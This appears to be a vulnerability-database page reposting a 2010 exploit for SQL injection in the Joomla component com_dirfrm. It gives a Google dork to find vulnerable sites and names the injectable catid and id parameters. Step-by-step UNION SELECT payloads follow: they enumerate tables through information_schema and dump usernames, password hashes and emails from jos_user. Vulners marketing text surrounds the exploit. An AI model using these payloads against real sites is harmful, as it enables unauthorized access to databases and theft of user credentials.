Lucene search
K

Joomla Dirfrm SQL Injection

🗓️ 18 Aug 2010 00:00:00Reported by HieuneoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

Joomla com_dirfrm SQL Injection 2010 Vietna

Code
`# Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  
# Date : 18 - 8 - 2010  
# Author : Hieuneo (Vietnam)  
# Version : All Versions  
# Tested on : Win 7 Home  
  
###############################################  
Dork google: inurl:"com_dirfrm"  
###############################################  
Exploit:  
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL  
Injection]&id=8&Itemid=32  
or  
http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL  
Injection]&Itemid=32  
###############################################  
[SQL Injection]:  
-> Step1:  
- order by n--- False  
- order by n+1-- True  
  
-> Step2:null Union select 1,2,3,4,...,n+1--  
Eg: http://site.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=null  
union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  
  
-> Step3: replace display number on website  
version(), user(), database  
#if version SQL >=5 : try exploit with table system:  
___table_name from information_scheama.tables where table_schema=database()--  
___column_name form information_schema.columns where table_name=Char(name table)  
#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  
  
-> Step 4: collecting information  
  
null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  
  
Done!  
#############Hieuneo@VBF################  
--  
Hieuneo  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
39